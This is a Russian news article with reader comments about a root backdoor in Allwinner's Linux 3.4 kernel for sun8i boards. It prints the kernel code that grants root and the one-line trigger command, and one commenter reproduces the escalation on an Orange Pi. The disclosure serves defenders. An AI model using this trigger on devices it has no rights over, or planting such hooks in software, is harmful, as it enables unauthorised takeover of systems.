Разработчики Linux-дистрибутива Armbian обратили внимание (http://forum.armbian.com/index.php/topic/1108-security-alert.../) на бэкдор, присутствующий в варианте ядра Linux, предлагаемом для устройств на базе процессоров Allwinner семейства sun8i (http://linux-sunxi.org) (H3, A83T и H8). Бэкдор позволяет получить привилегии root через запись строки "rootmydevice" в файл "/proc/sunxi_debug/sunxi_debug".

<font color="#461b7e">
   $ id
   uid=1000(user) gid=1000(user)

   $ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug

   $ id
   uid=0(root) gid=0(root)

</font>

Проблеме подвержены дистрибутивы и прошивки, использующие предлагаемое компанией Allwinner ядро Linux 3.4, поставляемое в составе официального BSP для Android. Например, бэкдор присутствует во всех основанных на ядре 3.4 системных образах для плат с процессорами Allwinner  H3, A83T и H8, включая Orange Pi, FriendlyARM (https://github.com/friendlyarm/h3_lichee/issues/1), SinoVoip M2+ (https://github.com/BPI-SINOVOIP/BPI-M2P-bsp/issues/1) и M3 Banana Pi (https://github.com/BPI-SINOVOIP/BPI-M3-bsp/issues/10), Cubietruck (https://github.com/cubieboard/Cubietruck_Plus-kernel-source/...) и LinkSprite pcDuino8 Uno (https://github.com/pcduino/pcduino8-uno-kernel/issues/3).

Для предоставления прав root в обработчике sunxi_proc_su_write используется (https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/...) следующий код, выставляющий привилегии root текущему процессу:

<font color="#461b7e">
        if(!strncmp("rootmydevice",(char*)buf,12)){
        cred = (struct cred *)__task_cred(current);
        cred->uid = 0;
        cred->gid = 0;
        cred->suid = 0;
        cred->euid = 0;
        cred->euid = 0;
        cred->egid = 0;
        cred->fsuid = 0;
        cred->fsgid = 0;
        printk("now you are root\n");
    }
</font>

Бэкдор позиционируется как отладочный режим, упрощающий получение прав root на портативных устройствах на базе платформы Android. В настоящее время уже подготовлен (https://github.com/friendlyarm/h3_lichee/commit/5d4d02b1c8f3...) патч, переводящий бэкдор в форму отключенной по умолчанию опции. Проблема уже устранена в выпуске дистрибутива  Armbian 5.10 (http://www.armbian.com/).

URL: http://www.theregister.co.uk/2016/05/09/allwinners_allloser_.../
Новость: http://www.opennet.ru/opennews/art.shtml?num=44395

• Бэкдор в отладочном коде модифицированного ядра Linux для си...,Аноним, 13:04 , 10-Май-16
  • Бэкдор в отладочном коде модифицированного ядра Linux для си...,Аноним, 13:11 , 10-Май-16
    • Бэкдор в отладочном коде модифицированного ядра Linux для си...,Аноним, 15:26 , 10-Май-16
      • Бэкдор в отладочном коде модифицированного ядра Linux для си...,Аноним, 16:17 , 10-Май-16
        • Бэкдор в отладочном коде модифицированного ядра Linux для си...,Fantomas, 04:46 , 11-Май-16
          • Бэкдор в отладочном коде модифицированного ядра Linux для си...,t28, 09:22 , 11-Май-16
    • Бэкдор в отладочном коде модифицированного ядра Linux для си...,Аноним, 23:23 , 10-Май-16
  • Бэкдор в отладочном коде модифицированного ядра Linux для си...,Аноним, 15:51 , 10-Май-16
  • Бэкдор в отладочном коде модифицированного ядра Linux для си...,Аноним, 17:45 , 10-Май-16
    • Бэкдор в отладочном коде модифицированного ядра Linux для си...,Eklykti, 19:37 , 10-Май-16
      • Бэкдор в отладочном коде модифицированного ядра Linux для си...,Crazy Alex, 20:20 , 10-Май-16
        • Бэкдор в отладочном коде модифицированного ядра Linux для си...,РОСКОМУЗОР, 21:10 , 10-Май-16
          • Бэкдор в отладочном коде модифицированного ядра Linux для си...,God, 21:38 , 10-Май-16
          • Бэкдор в отладочном коде модифицированного ядра Linux для си...,Crazy Alex, 21:48 , 10-Май-16
  • Бэкдор в отладочном коде модифицированного ядра Linux для си...,vitalif, 21:49 , 10-Май-16
• Бэкдор в отладочном коде модифицированного ядра Linux для си...,Аноним, 13:42 , 10-Май-16
• Бэкдор в отладочном коде модифицированного ядра Linux для си...,бедный буратино, 14:01 , 10-Май-16
  • Бэкдор в отладочном коде модифицированного ядра Linux для си...,Аноним, 23:25 , 10-Май-16
• Бэкдор в отладочном коде модифицированного ядра Linux для си...,Аноним as anon, 14:35 , 10-Май-16
  • Бэкдор в отладочном коде модифицированного ядра Linux для си...,p5n, 14:51 , 10-Май-16
    • Бэкдор в отладочном коде модифицированного ядра Linux для си...,Аноним, 17:47 , 10-Май-16
    • Бэкдор в отладочном коде модифицированного ядра Linux для си...,Аноним, 23:26 , 10-Май-16
• Бэкдор в отладочном коде модифицированного ядра Linux для си...,Аноним, 14:48 , 10-Май-16
  • Бэкдор в отладочном коде модифицированного ядра Linux для си...,p5n, 14:52 , 10-Май-16
• Бэкдор в отладочном коде модифицированного ядра Linux для си...,Аноним, 16:54 , 10-Май-16
  • Бэкдор в отладочном коде модифицированного ядра Linux для си...,Аноним, 16:56 , 10-Май-16
    • Бэкдор в отладочном коде модифицированного ядра Linux для си...,anonymous, 18:25 , 10-Май-16
• Бэкдор в отладочном коде модифицированного ядра Linux для си...,Аноним, 17:06 , 10-Май-16
  • Бэкдор в отладочном коде модифицированного ядра Linux для си...,Аноним, 23:28 , 10-Май-16
    • Бэкдор в отладочном коде модифицированного ядра Linux для си...,Аноним, 23:38 , 11-Май-16
• Бэкдор в отладочном коде модифицированного ядра Linux для си...,anonimus, 18:27 , 10-Май-16
  • Бэкдор в отладочном коде модифицированного ядра Linux для си...,тоже Аноним, 18:35 , 10-Май-16
    • Бэкдор в отладочном коде модифицированного ядра Linux для си...,anonimus, 18:44 , 10-Май-16
  • Бэкдор в отладочном коде модифицированного ядра Linux для си...,anonimus, 18:38 , 10-Май-16
    • Бэкдор в отладочном коде модифицированного ядра Linux для си...,Аноним, 19:25 , 10-Май-16
    • Бэкдор в отладочном коде модифицированного ядра Linux для си...,alex, 17:37 , 11-Май-16
• Бэкдор в отладочном коде модифицированного ядра Linux для си...,chinarulezzz, 22:27 , 10-Май-16
  • Бэкдор в отладочном коде модифицированного ядра Linux для си...,Аноним, 23:57 , 10-Май-16
• Бэкдор в отладочном коде модифицированного ядра Linux для си...,IZh., 11:56 , 11-Май-16
• Бэкдор в отладочном коде модифицированного ядра Linux для си...,Аноним, 17:50 , 11-Май-16
• Бэкдор в отладочном коде модифицированного ядра Linux для си...,Аноним, 17:53 , 11-Май-16
  • Бэкдор в отладочном коде модифицированного ядра Linux для си...,Аноним, 23:39 , 11-Май-16

отладочный режим для АНБ ФСБ КГБ

короче для всех кроме нас)

А вы, надо полагать, ЦРУ?

Нет, ми моссад.

Московский сад что ли?

Да.

>  короче для всех кроме нас)

А у тебя что, echo не работает?

ru.wikipedia.org
Совет по национальной безопасности (United States National Security Council) — совещательный и координирующий орган при Президенте США.
Национальный совет по контрразведке (National Counterintelligence Board).
Министерство национальной безопасности США.
Центральное разведывательное управление.
Агентство национальной безопасности (США).
Федеральное бюро расследований.
Разведывательное управление министерства обороны США.
Секретная служба США.
Национальное управление военно-космической разведки США.
Бюро разведки и исследований государственного департамента.
и другие (всего 16).
Так же к спецслужбам относятся и другие службы
Агентство по перспективным оборонным научно-исследовательским разработкам США.

Очень полезная функция на андроиде. Или получение рута через недокументированные "уязвимости" путем запуска подозрительных бинарей лучше?

Угу, только ты ставишь «калькулятор» из маркета, а он получает таким образом рута и ставит тебе уже настоящий бэкдор.

Если ты хочешь безопасность на андроиде - какой, к лешему, маркет? Опять же - в принципе можно и бинарный патч наложить после этого. Хотя бы просто строку покорёжить.

Если ты хочешь безопасность, какой к лешему андроид?

Если ты хочешь, то какая к лешему безопасность?

Самый обычный. Если не надо прятаться от спецслужб и прочих врагов, а всего лишь хочется не иметь вирусни - f-droid вместо непонятного софта из маркета и всё будет в порядке.

Не, на андроиде маст хэв!

Это не баг, это фича!

пойду свой armbian проверю

> пойду свой armbian проверю

Не надо всякие бэкдорианы ставить и вендорские ядра. Только майнлайн, только дебиан, только хардкор.

К андроиду данная новость не имеет никакого отношения. Если ни разу не видели что такое банана-пи и прочие линуксовые SOC, то просто переводите исходник новости без собственных пубертатных фантазий.

Например cubieboard идёт с прошитым андроидом. И есть планшеты на allwinner естественно не с ангстрём линуксом.

А вообще было бы здорово, если бы все производители BSP для мобильных чипов так делали. А то зарутовать телефон - целая проблема.

> Например cubieboard идёт с прошитым андроидом. И есть планшеты на allwinner естественно
> не с ангстрём линуксом.
> А вообще было бы здорово, если бы все производители BSP для мобильных
> чипов так делали. А то зарутовать телефон - целая проблема.

Только надо пароль рута потом сразу создавать, т е это должно сразу предлагаться в шелл при первм юзе, а потом отключать дырку.

> Например cubieboard идёт с прошитым андроидом.

У SD-карты приоритет. А у некоторых allwinner вообще только загрузка с карты и есть.

Может стоит написать в новости кто же этот герой, добавивший бэкдор?

> Может стоит написать в новости кто же этот герой, добавивший бэкдор?

Врядли компания Allwinner это расскажет. Речь о их форке ядра.

$ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug
-bash: /proc/sunxi_debug/sunxi_debug: No such file or directory
$ uname -a
Linux evo 3.4.79-sunxi #2 SMP PREEMPT Sun Jul 13 20:36:39 EEST 2014 armv7l GNU/Linux

а, там только для арм8. посыпаю голову пеплом :}

sun8i - это armv7

orangepi@OrangePI:~$ uname -a
Linux OrangePI 3.4.39 #2 SMP PREEMPT Mon Oct 12 12:03:03 CEST 2015 armv7l GNU/Linux
orangepi@OrangePI:~$ id
uid=1000(orangepi) gid=1000(orangepi) groups=1000(orangepi),27(sudo)
orangepi@OrangePI:~$ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug
orangepi@OrangePI:~$ id
uid=0(root) gid=0(root) groups=0(root),27(sudo),1000(orangepi)

тот самый случай, когда proc не в прок

> тот самый случай, когда proc не в прок

Отключи. Только как ты потом будешь смотреть что у тебя вообще запущено в системе?

>> тот самый случай, когда proc не в прок
> Отключи. Только как ты потом будешь смотреть что у тебя вообще запущено
> в системе?

Ныхрены это смотреть на _отлаженной_ системе?

Строка `cred->euid = 0;` написана 2 раза

Надо челу, рекламирующиему статический анализатор с блюющим единорогом, проверить алвинеровские бекдоры и запилить статью на хабр с объяснениями как испраить баги и ссылкой на англоязычный перевод.

Если их статический анализатор начнет еще и бэкдоры выявлять, имиджевому единорогу придется не только блевать радугой, но и какать бабочками.
Но пока, насколько мне известно, ему это не грозит.

Не выявлять бекдоры, а хотя бы писать их так, чтобы они во время своей паразитной работы не гробили систему. Очень печально, когда подобная гадость портит тебе жизнь. Учитывая, что столько косяков в 10 строчках и учитывая, что код работает в режиме ядра, очень стремно становится от мысли, что же там творится в более сложном коде.

да и код сравнения строк с strncmp написан неаккуратненько. Надо бы сначала убедиться что count >= 12 (еще лучше, просто == 12) и лишь затем вызывать  strncmp(..., 12)

А смысл? Вернет значение больше нуля да и ладно

count - это типа сначала длину строки в буфере проверить?
дак сравнение точно также пройдётся по нему
проблема может возникнуть только если буфер меньше 12+1 байт и при этом в нём нет нулевого байта, но тогда и длину не получится определить корректно.

> предлагаемое компанией Allwinner

к перцам нужно внимательней относиться)

>> предлагаемое компанией Allwinner
> к перцам нужно внимательней относиться)

У них там все драйверы такие. Где дебаг, где просто баг. Пользуйтесь майнлайном.

> cred->uid = 0;
> ...

А RCU для кого писано?
Вот тут точно статические анализаторы могли бы warning выдавать.

Э "Бэкдор позиционируется как отладочный ре" типа уже позиционируется малварь легальный можно писать и грабить что ле?

такая спокойная беседа о бэкдоре

> такая спокойная беседа о бэкдоре

Так они повсюду. Чтобы не понтоваться - надо выкинуть девайся и к староверам, в тайгу. А так, мыши, конечно, плакали, кололись - но фуле делать, социальность обезьяньего стада не истребить ничем! :)